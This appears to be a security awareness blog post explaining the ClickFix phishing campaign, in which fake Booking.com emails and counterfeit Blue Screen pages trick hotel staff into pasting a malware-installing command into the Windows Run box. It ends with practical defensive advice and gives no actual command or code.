Cyber criminals are getting better at one thing in particular. Convincing people to help them without realising it.
A recent campaign called ClickFix shows how attackers are using fear and urgency to trick everyday computer users into installing malware themselves. This attack has been seen mostly in Europe and is aimed at hotels and accommodation providers, but the technique could easily be used against anyone.
What is the ClickFix attack?
The attack usually starts with a fake email that looks like it comes from Booking.com. It might claim there is an urgent payment issue or a customer complaint that needs immediate attention.
When someone clicks the link in the email, they are taken to a malicious website. Instead of a normal web page, they see something designed to look like a Windows Blue Screen of Death. This is the scary error screen many people associate with serious system problems.
The fake screen tells the user that their computer has crashed and gives step by step instructions to fix it. The instructions ask the user to press the Windows key and R, open the Run box, and paste in a command to repair the problem.
Unfortunately, there is no problem at all. The command installs malware.
Why this trick works so well
This attack is clever because it relies on people, not software.
Most security tools are very good at blocking malicious downloads. They are not as good at stopping someone who is willingly copying and pasting commands because they believe they are fixing an error.
By following the instructions, the user unknowingly allows the attacker to install a remote access tool. This gives the attacker full control of the computer, including the ability to steal data, monitor activity, or spread further infections.
If the computer asks for permission during the process, the attackers rely on frustration. They repeatedly prompt the user until they click yes just to make the messages stop.
What attackers gain
Once installed, the malware hides itself inside legitimate Windows processes so it looks normal. This makes it harder for traditional antivirus software to spot.
From that point on, attackers can remotely access the system, steal credentials, capture sensitive data, and move deeper into a business network.
How to protect yourself and your team
The good news is that simple awareness goes a long way.
Never paste commands into the Windows Run box or PowerShell unless a trusted IT professional has asked you to do so. Legitimate websites do not display blue error screens or ask you to fix Windows issues from a browser.
Be cautious with urgent emails claiming to come from booking services or payment platforms. If something feels rushed or threatening, stop and verify it using official contact details rather than clicking links.
Make sure Windows is set to show full file extensions so it is easier to spot suspicious files.
If you manage systems, monitoring for unusual behaviour from built in Windows tools and enabling PowerShell logging can help detect attacks like this early.
The bigger lesson
This attack highlights a growing trend in cyber crime. Instead of fighting security software directly, attackers are targeting human behaviour.
By staying calm, slowing down, and questioning unexpected instructions, users can stop even very sophisticated attacks.
Sometimes the best security tool is simply knowing when not to click.
References
Bleeping Computer
https://www.bleepingcomputer.com/news/security/clickfix-attack-uses-fake-windows-bsod-screens-to-pu…
Securonix Blog
https://www.securonix.com/blog/analysis-how-living-off-the-land-tools-are-used-to-construct-a-malwa…